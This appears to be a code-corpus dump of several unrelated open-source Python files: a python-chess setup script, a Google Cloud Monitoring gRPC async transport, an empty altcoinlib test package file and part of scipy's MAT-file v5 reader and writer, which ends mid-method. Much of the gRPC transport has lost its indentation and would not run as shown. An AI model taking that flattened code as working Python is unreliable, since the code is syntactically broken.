# Copyright (C) 2012-2016 Niklas Fiekas <niklas.fiekas@backscattering.de>
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
import chess
import os
import setuptools
import sys
import platform
def read_description():
    """
    Reads the description from README.rst and substitutes mentions of the
    latest version with a concrete version number.

    Returns the README text with documentation links, the documentation
    badge and the Travis CI badge pinned to the current ``chess.__version__``.
    """
    # Use a context manager so the file handle is closed deterministically
    # (previously the handle was left for the garbage collector to close).
    with open(os.path.join(os.path.dirname(__file__), "README.rst")) as f:
        description = f.read()
    # Link to the documentation of the specific version.
    description = description.replace(
        "//python-chess.readthedocs.io/en/latest/",
        "//python-chess.readthedocs.io/en/v{0}/".format(chess.__version__))
    # Use documentation badge for the specific version.
    description = description.replace(
        "//readthedocs.org/projects/python-chess/badge/?version=latest",
        "//readthedocs.org/projects/python-chess/badge/?version=v{0}".format(chess.__version__))
    # Show Travis CI build status of the concrete version.
    description = description.replace(
        "//travis-ci.org/niklasf/python-chess.svg?branch=master",
        "//travis-ci.org/niklasf/python-chess.svg?branch=v{0}".format(chess.__version__))
    return description
def dependencies():
    """Return the list of required install-time dependencies.

    Only interpreters older than Python 2.7 need the
    ``backport_collections`` package; everywhere else the list is empty.
    """
    needs_backport = sys.version_info < (2, 7)
    return ["backport_collections"] if needs_backport else []
def extra_dependencies():
    """Return the mapping of optional-feature names to extra dependencies.

    - "uci": needs the ``futures`` backport before Python 3.2.
    - "gaviota": only defined on CPython; needs ``backports.lzma``
      before Python 3.3.
    - "test": union of the above plus test-only helpers (``unittest2``
      before 2.7, ``spur`` on CPython).
    """
    is_cpython = platform.python_implementation() == "CPython"
    extras = {
        "uci": ["futures"] if sys.version_info < (3, 2) else [],
    }
    if is_cpython:
        extras["gaviota"] = (
            ["backports.lzma"] if sys.version_info < (3, 3) else []
        )
    test_deps = extras["uci"] + extras.get("gaviota", [])
    if sys.version_info < (2, 7):
        test_deps.append("unittest2")
    if is_cpython:
        test_deps.append("spur")
    extras["test"] = test_deps
    return extras
# Distribution metadata; executed when this setup script is run by
# pip / setuptools (install, sdist, test, ...). Version/author/description
# are taken from the chess package itself so there is one source of truth.
setuptools.setup(
    name="python-chess",
    version=chess.__version__,
    author=chess.__author__,
    author_email=chess.__email__,
    description=chess.__doc__.replace("\n", " ").strip(),
    long_description=read_description(),
    license="GPL3",
    keywords="chess fen pgn polyglot syzygy gaviota uci",
    url="https://github.com/niklasf/python-chess",
    packages=["chess"],
    test_suite="test",
    install_requires=dependencies(),
    extras_require=extra_dependencies(),
    tests_require=extra_dependencies().get("test"),
    classifiers=[
        "Development Status :: 5 - Production/Stable",
        "Intended Audience :: Developers",
        "License :: OSI Approved :: GNU General Public License (GPL)",
        "Operating System :: OS Independent",
        "Programming Language :: Python",
        "Programming Language :: Python :: 2",
        "Programming Language :: Python :: 2.6",
        "Programming Language :: Python :: 2.7",
        "Programming Language :: Python :: 3",
        "Programming Language :: Python :: 3.3",
        "Programming Language :: Python :: 3.4",
        "Programming Language :: Python :: 3.5",
        "Topic :: Games/Entertainment :: Board Games",
        "Topic :: Software Development :: Libraries :: Python Modules",
    ],
)
|
BradleyConn/brickhack
|
setup.py
|
Python
|
gpl-3.0
| 3,922
|
# -*- coding: utf-8 -*-
# Copyright 2022 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
import warnings
from typing import Awaitable, Callable, Dict, Optional, Sequence, Tuple, Union
from google.api_core import gapic_v1
from google.api_core import grpc_helpers_async
from google.api_core import operations_v1
from google.auth import credentials as ga_credentials # type: ignore
from google.auth.transport.grpc import SslCredentials # type: ignore
import grpc # type: ignore
from grpc.experimental import aio # type: ignore
from google.cloud.monitoring_metrics_scope_v1.types import metrics_scope
from google.cloud.monitoring_metrics_scope_v1.types import metrics_scopes
from google.longrunning import operations_pb2 # type: ignore
from .base import MetricsScopesTransport, DEFAULT_CLIENT_INFO
from .grpc import MetricsScopesGrpcTransport
class MetricsScopesGrpcAsyncIOTransport(MetricsScopesTransport):
"""gRPC AsyncIO backend transport for MetricsScopes.
Manages Cloud Monitoring Metrics Scopes, and the monitoring
of Google Cloud projects and AWS accounts.
This class defines the same methods as the primary client, so the
primary client can load the underlying transport implementation
and call it.
It sends protocol buffers over the wire using gRPC (which is built on
top of HTTP/2); the ``grpcio`` package must be installed.
"""
_grpc_channel: aio.Channel
_stubs: Dict[str, Callable] = {}
@classmethod
def create_channel(
cls,
host: str = "monitoring.googleapis.com",
credentials: ga_credentials.Credentials = None,
credentials_file: Optional[str] = None,
scopes: Optional[Sequence[str]] = None,
quota_project_id: Optional[str] = None,
**kwargs,
) -> aio.Channel:
"""Create and return a gRPC AsyncIO channel object.
Args:
host (Optional[str]): The host for the channel to use.
credentials (Optional[~.Credentials]): The
authorization credentials to attach to requests. These
credentials identify this application to the service. If
none are specified, the client will attempt to ascertain
the credentials from the environment.
credentials_file (Optional[str]): A file with credentials that can
be loaded with :func:`google.auth.load_credentials_from_file`.
This argument is ignored if ``channel`` is provided.
scopes (Optional[Sequence[str]]): A optional list of scopes needed for this
service. These are only used when credentials are not specified and
are passed to :func:`google.auth.default`.
quota_project_id (Optional[str]): An optional project to use for billing
and quota.
kwargs (Optional[dict]): Keyword arguments, which are passed to the
channel creation.
Returns:
aio.Channel: A gRPC AsyncIO channel object.
"""
return grpc_helpers_async.create_channel(
host,
credentials=credentials,
credentials_file=credentials_file,
quota_project_id=quota_project_id,
default_scopes=cls.AUTH_SCOPES,
scopes=scopes,
default_host=cls.DEFAULT_HOST,
**kwargs,
)
    def __init__(
        self,
        *,
        host: str = "monitoring.googleapis.com",
        credentials: ga_credentials.Credentials = None,
        credentials_file: Optional[str] = None,
        scopes: Optional[Sequence[str]] = None,
        channel: aio.Channel = None,
        api_mtls_endpoint: str = None,
        client_cert_source: Callable[[], Tuple[bytes, bytes]] = None,
        ssl_channel_credentials: grpc.ChannelCredentials = None,
        client_cert_source_for_mtls: Callable[[], Tuple[bytes, bytes]] = None,
        quota_project_id=None,
        client_info: gapic_v1.client_info.ClientInfo = DEFAULT_CLIENT_INFO,
        always_use_jwt_access: Optional[bool] = False,
    ) -> None:
        """Instantiate the transport.

        Args:
            host (Optional[str]):
                 The hostname to connect to.
            credentials (Optional[google.auth.credentials.Credentials]): The
                authorization credentials to attach to requests. These
                credentials identify the application to the service; if none
                are specified, the client will attempt to ascertain the
                credentials from the environment.
                This argument is ignored if ``channel`` is provided.
            credentials_file (Optional[str]): A file with credentials that can
                be loaded with :func:`google.auth.load_credentials_from_file`.
                This argument is ignored if ``channel`` is provided.
            scopes (Optional[Sequence[str]]): A optional list of scopes needed for this
                service. These are only used when credentials are not specified and
                are passed to :func:`google.auth.default`.
            channel (Optional[aio.Channel]): A ``Channel`` instance through
                which to make calls.
            api_mtls_endpoint (Optional[str]): Deprecated. The mutual TLS endpoint.
                If provided, it overrides the ``host`` argument and tries to create
                a mutual TLS channel with client SSL credentials from
                ``client_cert_source`` or application default SSL credentials.
            client_cert_source (Optional[Callable[[], Tuple[bytes, bytes]]]):
                Deprecated. A callback to provide client SSL certificate bytes and
                private key bytes, both in PEM format. It is ignored if
                ``api_mtls_endpoint`` is None.
            ssl_channel_credentials (grpc.ChannelCredentials): SSL credentials
                for the grpc channel. It is ignored if ``channel`` is provided.
            client_cert_source_for_mtls (Optional[Callable[[], Tuple[bytes, bytes]]]):
                A callback to provide client certificate bytes and private key bytes,
                both in PEM format. It is used to configure a mutual TLS channel. It is
                ignored if ``channel`` or ``ssl_channel_credentials`` is provided.
            quota_project_id (Optional[str]): An optional project to use for billing
                and quota.
            client_info (google.api_core.gapic_v1.client_info.ClientInfo):
                The client info used to send a user-agent string along with
                API requests. If ``None``, then default info will be used.
                Generally, you only need to set this if you're developing
                your own client library.
            always_use_jwt_access (Optional[bool]): Whether self signed JWT should
                be used for service account credentials.

        Raises:
            google.auth.exceptions.MutualTlsChannelError: If mutual TLS transport
              creation failed for any reason.
            google.api_core.exceptions.DuplicateCredentialArgs: If both ``credentials``
              and ``credentials_file`` are passed.
        """
        self._grpc_channel = None
        self._ssl_channel_credentials = ssl_channel_credentials
        # Per-RPC stub cache, populated lazily by the stub properties below.
        self._stubs: Dict[str, Callable] = {}
        # Lazily created by the ``operations_client`` property.
        self._operations_client: Optional[operations_v1.OperationsAsyncClient] = None

        if api_mtls_endpoint:
            warnings.warn("api_mtls_endpoint is deprecated", DeprecationWarning)
        if client_cert_source:
            warnings.warn("client_cert_source is deprecated", DeprecationWarning)

        if channel:
            # Ignore credentials if a channel was passed.
            credentials = False
            # If a channel was explicitly provided, set it.
            self._grpc_channel = channel
            self._ssl_channel_credentials = None
        else:
            # No channel given: work out which SSL credentials to use for the
            # channel we create below.
            if api_mtls_endpoint:
                host = api_mtls_endpoint

                # Create SSL credentials with client_cert_source or application
                # default SSL credentials.
                if client_cert_source:
                    cert, key = client_cert_source()
                    self._ssl_channel_credentials = grpc.ssl_channel_credentials(
                        certificate_chain=cert, private_key=key
                    )
                else:
                    self._ssl_channel_credentials = SslCredentials().ssl_credentials
            else:
                if client_cert_source_for_mtls and not ssl_channel_credentials:
                    cert, key = client_cert_source_for_mtls()
                    self._ssl_channel_credentials = grpc.ssl_channel_credentials(
                        certificate_chain=cert, private_key=key
                    )

        # The base transport sets the host, credentials and scopes
        super().__init__(
            host=host,
            credentials=credentials,
            credentials_file=credentials_file,
            scopes=scopes,
            quota_project_id=quota_project_id,
            client_info=client_info,
            always_use_jwt_access=always_use_jwt_access,
        )

        if not self._grpc_channel:
            self._grpc_channel = type(self).create_channel(
                self._host,
                # use the credentials which are saved
                credentials=self._credentials,
                # Set ``credentials_file`` to ``None`` here as
                # the credentials that we saved earlier should be used.
                credentials_file=None,
                scopes=self._scopes,
                ssl_credentials=self._ssl_channel_credentials,
                quota_project_id=quota_project_id,
                options=[
                    ("grpc.max_send_message_length", -1),
                    ("grpc.max_receive_message_length", -1),
                ],
            )

        # Wrap messages. This must be done after self._grpc_channel exists
        self._prep_wrapped_messages(client_info)
@property
def grpc_channel(self) -> aio.Channel:
"""Create the channel designed to connect to this service.
This property caches on the instance; repeated calls return
the same channel.
"""
# Return the channel from cache.
return self._grpc_channel
@property
def operations_client(self) -> operations_v1.OperationsAsyncClient:
"""Create the client designed to process long-running operations.
This property caches on the instance; repeated calls return the same
client.
"""
# Quick check: Only create a new client if we do not already have one.
if self._operations_client is None:
self._operations_client = operations_v1.OperationsAsyncClient(
self.grpc_channel
)
# Return the client from cache.
return self._operations_client
@property
def get_metrics_scope(
self,
) -> Callable[
[metrics_scopes.GetMetricsScopeRequest], Awaitable[metrics_scope.MetricsScope]
]:
r"""Return a callable for the get metrics scope method over gRPC.
Returns a specific ``Metrics Scope``.
Returns:
Callable[[~.GetMetricsScopeRequest],
Awaitable[~.MetricsScope]]:
A function that, when called, will call the underlying RPC
on the server.
"""
# Generate a "stub function" on-the-fly which will actually make
# the request.
# gRPC handles serialization and deserialization, so we just need
# to pass in the functions for each.
if "get_metrics_scope" not in self._stubs:
self._stubs["get_metrics_scope"] = self.grpc_channel.unary_unary(
"/google.monitoring.metricsscope.v1.MetricsScopes/GetMetricsScope",
request_serializer=metrics_scopes.GetMetricsScopeRequest.serialize,
response_deserializer=metrics_scope.MetricsScope.deserialize,
)
return self._stubs["get_metrics_scope"]
@property
def list_metrics_scopes_by_monitored_project(
self,
) -> Callable[
[metrics_scopes.ListMetricsScopesByMonitoredProjectRequest],
Awaitable[metrics_scopes.ListMetricsScopesByMonitoredProjectResponse],
]:
r"""Return a callable for the list metrics scopes by
monitored project method over gRPC.
Returns a list of every ``Metrics Scope`` that a specific
``MonitoredProject`` has been added to. The metrics scope
representing the specified monitored project will always be the
first entry in the response.
Returns:
Callable[[~.ListMetricsScopesByMonitoredProjectRequest],
Awaitable[~.ListMetricsScopesByMonitoredProjectResponse]]:
A function that, when called, will call the underlying RPC
on the server.
"""
# Generate a "stub function" on-the-fly which will actually make
# the request.
# gRPC handles serialization and deserialization, so we just need
# to pass in the functions for each.
if "list_metrics_scopes_by_monitored_project" not in self._stubs:
self._stubs[
"list_metrics_scopes_by_monitored_project"
] = self.grpc_channel.unary_unary(
"/google.monitoring.metricsscope.v1.MetricsScopes/ListMetricsScopesByMonitoredProject",
request_serializer=metrics_scopes.ListMetricsScopesByMonitoredProjectRequest.serialize,
response_deserializer=metrics_scopes.ListMetricsScopesByMonitoredProjectResponse.deserialize,
)
return self._stubs["list_metrics_scopes_by_monitored_project"]
@property
def create_monitored_project(
self,
) -> Callable[
[metrics_scopes.CreateMonitoredProjectRequest],
Awaitable[operations_pb2.Operation],
]:
r"""Return a callable for the create monitored project method over gRPC.
Adds a ``MonitoredProject`` with the given project ID to the
specified ``Metrics Scope``.
Returns:
Callable[[~.CreateMonitoredProjectRequest],
Awaitable[~.Operation]]:
A function that, when called, will call the underlying RPC
on the server.
"""
# Generate a "stub function" on-the-fly which will actually make
# the request.
# gRPC handles serialization and deserialization, so we just need
# to pass in the functions for each.
if "create_monitored_project" not in self._stubs:
self._stubs["create_monitored_project"] = self.grpc_channel.unary_unary(
"/google.monitoring.metricsscope.v1.MetricsScopes/CreateMonitoredProject",
request_serializer=metrics_scopes.CreateMonitoredProjectRequest.serialize,
response_deserializer=operations_pb2.Operation.FromString,
)
return self._stubs["create_monitored_project"]
@property
def delete_monitored_project(
self,
) -> Callable[
[metrics_scopes.DeleteMonitoredProjectRequest],
Awaitable[operations_pb2.Operation],
]:
r"""Return a callable for the delete monitored project method over gRPC.
Deletes a ``MonitoredProject`` from the specified
``Metrics Scope``.
Returns:
Callable[[~.DeleteMonitoredProjectRequest],
Awaitable[~.Operation]]:
A function that, when called, will call the underlying RPC
on the server.
"""
# Generate a "stub function" on-the-fly which will actually make
# the request.
# gRPC handles serialization and deserialization, so we just need
# to pass in the functions for each.
if "delete_monitored_project" not in self._stubs:
self._stubs["delete_monitored_project"] = self.grpc_channel.unary_unary(
"/google.monitoring.metricsscope.v1.MetricsScopes/DeleteMonitoredProject",
request_serializer=metrics_scopes.DeleteMonitoredProjectRequest.serialize,
response_deserializer=operations_pb2.Operation.FromString,
)
return self._stubs["delete_monitored_project"]
def close(self):
return self.grpc_channel.close()
# Public re-export surface of this module.
__all__ = ("MetricsScopesGrpcAsyncIOTransport",)
|
googleapis/python-monitoring-metrics-scopes
|
google/cloud/monitoring_metrics_scope_v1/services/metrics_scopes/transports/grpc_asyncio.py
|
Python
|
apache-2.0
| 17,038
|
# Copyright (C) 2013-2014 The python-bitcoinlib developers
# Copyright (C) 2015 The python-altcoinlib developers
#
# This file is part of python-altcoinlib.
#
# It is subject to the license terms in the LICENSE file found in the top-level
# directory of this distribution.
#
# No part of python-altcoinlib, including this file, may be copied, modified,
# propagated, or distributed except according to the terms contained in the
# LICENSE file.
from __future__ import absolute_import, division, print_function, unicode_literals
|
rnicoll/python-altcoinlib
|
altcoin/tests/__init__.py
|
Python
|
lgpl-3.0
| 529
|
''' Classes for read / write of matlab (TM) 5 files
The matfile specification last found here:
http://www.mathworks.com/access/helpdesk/help/pdf_doc/matlab/matfile_format.pdf
(as of December 5 2008)
'''
from __future__ import division, print_function, absolute_import
'''
=================================
Note on functions and mat files
=================================
The document above does not give any hints as to the storage of matlab
function handles, or anonymous function handles. I had therefore to
guess the format of matlab arrays of ``mxFUNCTION_CLASS`` and
``mxOPAQUE_CLASS`` by looking at example mat files.
``mxFUNCTION_CLASS`` stores all types of matlab functions. It seems to
contain a struct matrix with a set pattern of fields. For anonymous
functions, a sub-fields of one of these fields seems to contain the
well-named ``mxOPAQUE_CLASS``. This seems to contain:
* array flags as for any matlab matrix
* 3 int8 strings
* a matrix
It seems that, whenever the mat file contains a ``mxOPAQUE_CLASS``
instance, there is also an un-named matrix (name == '') at the end of
the mat file. I'll call this the ``__function_workspace__`` matrix.
When I saved two anonymous functions in a mat file, or appended another
anonymous function to the mat file, there was still only one
``__function_workspace__`` un-named matrix at the end, but larger than
that for a mat file with a single anonymous function, suggesting that
the workspaces for the two functions had been merged.
The ``__function_workspace__`` matrix appears to be of double class
(``mxCLASS_DOUBLE``), but stored as uint8, the memory for which is in
the format of a mini .mat file, without the first 124 bytes of the file
header (the description and the subsystem_offset), but with the version
U2 bytes, and the S2 endian test bytes. There follow 4 zero bytes,
presumably for 8 byte padding, and then a series of ``miMATRIX``
entries, as in a standard mat file. The ``miMATRIX`` entries appear to
be series of un-named (name == '') matrices, and may also contain arrays
of this same mini-mat format.
I guess that:
* saving an anonymous function back to a mat file will need the
associated ``__function_workspace__`` matrix saved as well for the
anonymous function to work correctly.
* appending to a mat file that has a ``__function_workspace__`` would
involve first pulling off this workspace, appending, checking whether
there were any more anonymous functions appended, and then somehow
merging the relevant workspaces, and saving at the end of the mat
file.
The mat files I was playing with are in ``tests/data``:
* sqr.mat
* parabola.mat
* some_functions.mat
See ``tests/test_mio.py:test_mio_funcs.py`` for a debugging
script I was working with.
'''
# Small fragments of current code adapted from matfile.py by Heiko
# Henkelmann
import os
import time
import sys
import zlib
from io import BytesIO
import warnings
import numpy as np
from numpy.compat import asbytes, asstr
import scipy.sparse
from scipy._lib.six import string_types
from .byteordercodes import native_code, swapped_code
from .miobase import (MatFileReader, docfiller, matdims, read_dtype,
arr_to_chars, arr_dtype_number, MatWriteError,
MatReadError, MatReadWarning)
# Reader object for matlab 5 format variables
from .mio5_utils import VarReader5
# Constants and helper objects
from .mio5_params import (MatlabObject, MatlabFunction, MDTYPES, NP_TO_MTYPES,
NP_TO_MXTYPES, miCOMPRESSED, miMATRIX, miINT8,
miUTF8, miUINT32, mxCELL_CLASS, mxSTRUCT_CLASS,
mxOBJECT_CLASS, mxCHAR_CLASS, mxSPARSE_CLASS,
mxDOUBLE_CLASS, mclass_info)
from .streams import ZlibInputStream
class MatFile5Reader(MatFileReader):
    ''' Reader for Mat 5 mat files

    Adds the following attribute to base class

    uint16_codec - char codec to use for uint16 char arrays
        (defaults to system default codec)

    Uses variable reader that has the following standard interface (see
    abstract class in ``miobase``)::

       __init__(self, file_reader)
       read_header(self)
       array_from_header(self)

    and added interface::

       set_stream(self, stream)
       read_full_tag(self)
    '''
    @docfiller
    def __init__(self,
                 mat_stream,
                 byte_order=None,
                 mat_dtype=False,
                 squeeze_me=False,
                 chars_as_strings=True,
                 matlab_compatible=False,
                 struct_as_record=True,
                 verify_compressed_data_integrity=True,
                 uint16_codec=None
                 ):
        '''Initializer for matlab 5 file format reader

    %(matstream_arg)s
    %(load_args)s
    %(struct_arg)s
    uint16_codec : {None, string}
        Set codec to use for uint16 char arrays (e.g. 'utf-8').
        Use system default codec if None
        '''
        super(MatFile5Reader, self).__init__(
            mat_stream,
            byte_order,
            mat_dtype,
            squeeze_me,
            chars_as_strings,
            matlab_compatible,
            struct_as_record,
            verify_compressed_data_integrity
        )
        # Set uint16 codec
        if not uint16_codec:
            uint16_codec = sys.getdefaultencoding()
        self.uint16_codec = uint16_codec
        # placeholders for readers - see initialize_read method
        self._file_reader = None
        self._matrix_reader = None

    def guess_byte_order(self):
        ''' Guess byte order.

        Sets stream pointer to 0 '''
        # The 2-byte endian-test field sits at offset 126 in the file
        # header; it reads b'IM' when the file was written little-endian,
        # b'MI' when big-endian.
        self.mat_stream.seek(126)
        mi = self.mat_stream.read(2)
        self.mat_stream.seek(0)
        return mi == b'IM' and '<' or '>'

    def read_file_header(self):
        ''' Read in mat 5 file header '''
        hdict = {}
        hdr_dtype = MDTYPES[self.byte_order]['dtypes']['file_header']
        hdr = read_dtype(self.mat_stream, hdr_dtype)
        hdict['__header__'] = hdr['description'].item().strip(b' \t\n\000')
        # version is stored as (major << 8) | minor
        v_major = hdr['version'] >> 8
        v_minor = hdr['version'] & 0xFF
        hdict['__version__'] = '%d.%d' % (v_major, v_minor)
        return hdict

    def initialize_read(self):
        ''' Run when beginning read of variables

        Sets up readers from parameters in `self`
        '''
        # reader for top level stream. We need this extra top-level
        # reader because we use the matrix_reader object to contain
        # compressed matrices (so they have their own stream)
        self._file_reader = VarReader5(self)
        # reader for matrix streams
        self._matrix_reader = VarReader5(self)

    def read_var_header(self):
        ''' Read header, return header, next position

        Header has to define at least .name and .is_global

        Parameters
        ----------
        None

        Returns
        -------
        header : object
           object that can be passed to self.read_var_array, and that
           has attributes .name and .is_global
        next_position : int
           position in stream of next variable
        '''
        mdtype, byte_count = self._file_reader.read_full_tag()
        if not byte_count > 0:
            raise ValueError("Did not read any bytes")
        next_pos = self.mat_stream.tell() + byte_count
        if mdtype == miCOMPRESSED:
            # Make new stream from compressed data
            stream = ZlibInputStream(self.mat_stream, byte_count)
            self._matrix_reader.set_stream(stream)
            check_stream_limit = self.verify_compressed_data_integrity
            mdtype, byte_count = self._matrix_reader.read_full_tag()
        else:
            check_stream_limit = False
            self._matrix_reader.set_stream(self.mat_stream)
        if not mdtype == miMATRIX:
            raise TypeError('Expecting miMATRIX type here, got %d' % mdtype)
        header = self._matrix_reader.read_header(check_stream_limit)
        return header, next_pos

    def read_var_array(self, header, process=True):
        ''' Read array, given `header`

        Parameters
        ----------
        header : header object
           object with fields defining variable header
        process : {True, False} bool, optional
           If True, apply recursive post-processing during loading of
           array.

        Returns
        -------
        arr : array
           array with post-processing applied or not according to
           `process`.
        '''
        return self._matrix_reader.array_from_header(header, process)

    def get_variables(self, variable_names=None):
        ''' get variables from stream as dictionary

        variable_names - optional list of variable names to get

        If variable_names is None, then get all variables in file
        '''
        if isinstance(variable_names, string_types):
            variable_names = [variable_names]
        elif variable_names is not None:
            # copy so we can destructively remove names as they are found
            variable_names = list(variable_names)
        self.mat_stream.seek(0)
        # Here we pass all the parameters in self to the reading objects
        self.initialize_read()
        mdict = self.read_file_header()
        mdict['__globals__'] = []
        while not self.end_of_stream():
            hdr, next_position = self.read_var_header()
            name = asstr(hdr.name)
            if name in mdict:
                warnings.warn('Duplicate variable name "%s" in stream'
                              ' - replacing previous with new\n'
                              'Consider mio5.varmats_from_mat to split '
                              'file into single variable files' % name,
                              MatReadWarning, stacklevel=2)
            if name == '':
                # can only be a matlab 7 function workspace
                name = '__function_workspace__'
                # We want to keep this raw because mat_dtype processing
                # will break the format (uint8 as mxDOUBLE_CLASS)
                process = False
            else:
                process = True
            if variable_names is not None and name not in variable_names:
                self.mat_stream.seek(next_position)
                continue
            try:
                res = self.read_var_array(hdr, process)
            except MatReadError as err:
                warnings.warn(
                    'Unreadable variable "%s", because "%s"' %
                    (name, err),
                    Warning, stacklevel=2)
                res = "Read error: %s" % err
            self.mat_stream.seek(next_position)
            mdict[name] = res
            if hdr.is_global:
                mdict['__globals__'].append(name)
            if variable_names is not None:
                variable_names.remove(name)
                if len(variable_names) == 0:
                    break
        return mdict

    def list_variables(self):
        ''' list variables from stream

        Returns list of (name, shape, info-string) tuples without reading
        the variable contents.
        '''
        self.mat_stream.seek(0)
        # Here we pass all the parameters in self to the reading objects
        self.initialize_read()
        self.read_file_header()
        vars = []
        while not self.end_of_stream():
            hdr, next_position = self.read_var_header()
            name = asstr(hdr.name)
            if name == '':
                # can only be a matlab 7 function workspace
                name = '__function_workspace__'

            shape = self._matrix_reader.shape_from_header(hdr)
            if hdr.is_logical:
                info = 'logical'
            else:
                info = mclass_info.get(hdr.mclass, 'unknown')
            vars.append((name, shape, info))

            self.mat_stream.seek(next_position)
        return vars
def varmats_from_mat(file_obj):
    """ Pull variables out of mat 5 file as a sequence of mat file objects

    This can be useful with a difficult mat file, containing unreadable
    variables. This routine pulls the variables out in raw form and puts them,
    unread, back into a file stream for saving or reading. Another use is the
    pathological case where there is more than one variable of the same name in
    the file; this routine returns the duplicates, whereas the standard reader
    will overwrite duplicates in the returned dictionary.

    The file pointer in `file_obj` will be undefined. File pointers for the
    returned file-like objects are set at 0.

    Parameters
    ----------
    file_obj : file-like
        file object containing mat file

    Returns
    -------
    named_mats : list
        list contains tuples of (name, BytesIO) where BytesIO is a file-like
        object containing mat file contents as for a single variable. The
        BytesIO contains a string with the original header and a single var. If
        ``var_file_obj`` is an individual BytesIO instance, then save as a mat
        file with something like ``open('test.mat',
        'wb').write(var_file_obj.read())``

    Examples
    --------
    >>> import scipy.io

    BytesIO is from the ``io`` module in python 3, and is ``cStringIO`` for
    python < 3.

    >>> mat_fileobj = BytesIO()
    >>> scipy.io.savemat(mat_fileobj, {'b': np.arange(10), 'a': 'a string'})
    >>> varmats = varmats_from_mat(mat_fileobj)
    >>> sorted([name for name, str_obj in varmats])
    ['a', 'b']
    """
    rdr = MatFile5Reader(file_obj)
    file_obj.seek(0)
    # Raw read of top-level file header
    hdr_len = MDTYPES[native_code]['dtypes']['file_header'].itemsize
    raw_hdr = file_obj.read(hdr_len)
    # Initialize variable reading
    file_obj.seek(0)
    rdr.initialize_read()
    mdict = rdr.read_file_header()
    next_position = file_obj.tell()
    named_mats = []
    while not rdr.end_of_stream():
        start_position = next_position
        hdr, next_position = rdr.read_var_header()
        name = asstr(hdr.name)
        # Read raw variable string: the header read above told us where
        # the variable's bytes end, so we can slice them out verbatim.
        file_obj.seek(start_position)
        byte_count = next_position - start_position
        var_str = file_obj.read(byte_count)
        # write to stringio object: original file header + this one
        # variable makes a valid single-variable mat file.
        out_obj = BytesIO()
        out_obj.write(raw_hdr)
        out_obj.write(var_str)
        out_obj.seek(0)
        named_mats.append((name, out_obj))
    return named_mats
# Sentinel: ``to_writeable`` returns this class itself (not an instance) to
# signal that the source was equivalent to an empty matlab struct.
class EmptyStructMarker(object):
    """ Class to indicate presence of empty matlab struct on output """
def to_writeable(source):
    ''' Convert input object ``source`` to something we can write

    Parameters
    ----------
    source : object

    Returns
    -------
    arr : None or ndarray or EmptyStructMarker
        If `source` cannot be converted to something we can write to a matfile,
        return None.  If `source` is equivalent to an empty dictionary, return
        ``EmptyStructMarker``.  Otherwise return `source` converted to an
        ndarray with contents for writing to matfile.
    '''
    # Arrays pass straight through; None signals "not writeable".
    if isinstance(source, np.ndarray):
        return source
    if source is None:
        return None
    # Objects that implement the mapping protocol
    mapping = all(hasattr(source, attr) for attr in ('keys', 'values', 'items'))
    if isinstance(source, np.generic):
        # Numpy scalars are never mappings (pypy issue workaround)
        pass
    elif not mapping and hasattr(source, '__dict__'):
        # Not a mapping, but has an instance dict: treat its public
        # attributes as the fields of a struct.
        source = {key: value for key, value in source.__dict__.items()
                  if not key.startswith('_')}
        mapping = True
    if mapping:
        dtype = []
        values = []
        for field, value in source.items():
            # Only string keys that could be matlab field names are kept.
            if (isinstance(field, string_types) and
                    field[0] not in '_0123456789'):
                dtype.append((str(field), object))
                values.append(value)
        if not dtype:
            return EmptyStructMarker
        return np.array([tuple(values)], dtype)
    # Next try and convert to an array
    narr = np.asanyarray(source)
    if narr.dtype.type in (object, np.object_) and \
       narr.shape == () and narr == source:
        # No interesting conversion possible
        return None
    return narr
# Native byte ordered dtypes for convenience for writers
# (file header, full and small-data element tags, and the array-flags
# sub-element of the miMATRIX header)
NDT_FILE_HDR = MDTYPES[native_code]['dtypes']['file_header']
NDT_TAG_FULL = MDTYPES[native_code]['dtypes']['tag_full']
NDT_TAG_SMALL = MDTYPES[native_code]['dtypes']['tag_smalldata']
NDT_ARRAY_FLAGS = MDTYPES[native_code]['dtypes']['array_flags']
class VarWriter5(object):
    ''' Generic matlab matrix writing class '''
    # Template miMATRIX tag; byte_count is patched per-variable in
    # update_matrix_tag.
    mat_tag = np.zeros((), NDT_TAG_FULL)
    mat_tag['mdtype'] = miMATRIX

    def __init__(self, file_writer):
        # Copy write options from the owning MatFile5Writer.
        self.file_stream = file_writer.file_stream
        self.unicode_strings = file_writer.unicode_strings
        self.long_field_names = file_writer.long_field_names
        self.oned_as = file_writer.oned_as
        # These are used for top level writes, and unset after
        self._var_name = None
        self._var_is_global = False

    def write_bytes(self, arr):
        # matlab stores data Fortran (column-major) ordered
        self.file_stream.write(arr.tostring(order='F'))

    def write_string(self, s):
        self.file_stream.write(s)

    def write_element(self, arr, mdtype=None):
        ''' write tag and data '''
        if mdtype is None:
            mdtype = NP_TO_MTYPES[arr.dtype.str[1:]]
        # Array needs to be in native byte order
        if arr.dtype.byteorder == swapped_code:
            arr = arr.byteswap().newbyteorder()
        byte_count = arr.size*arr.itemsize
        # Data of 4 bytes or fewer fits in the "small data element" format,
        # packed into the tag itself.
        if byte_count <= 4:
            self.write_smalldata_element(arr, mdtype, byte_count)
        else:
            self.write_regular_element(arr, mdtype, byte_count)

    def write_smalldata_element(self, arr, mdtype, byte_count):
        # write tag with embedded data
        tag = np.zeros((), NDT_TAG_SMALL)
        tag['byte_count_mdtype'] = (byte_count << 16) + mdtype
        # if arr.tostring is < 4, the element will be zero-padded as needed.
        tag['data'] = arr.tostring(order='F')
        self.write_bytes(tag)

    def write_regular_element(self, arr, mdtype, byte_count):
        # write tag, data
        tag = np.zeros((), NDT_TAG_FULL)
        tag['mdtype'] = mdtype
        tag['byte_count'] = byte_count
        self.write_bytes(tag)
        self.write_bytes(arr)
        # pad to next 64-bit boundary
        bc_mod_8 = byte_count % 8
        if bc_mod_8:
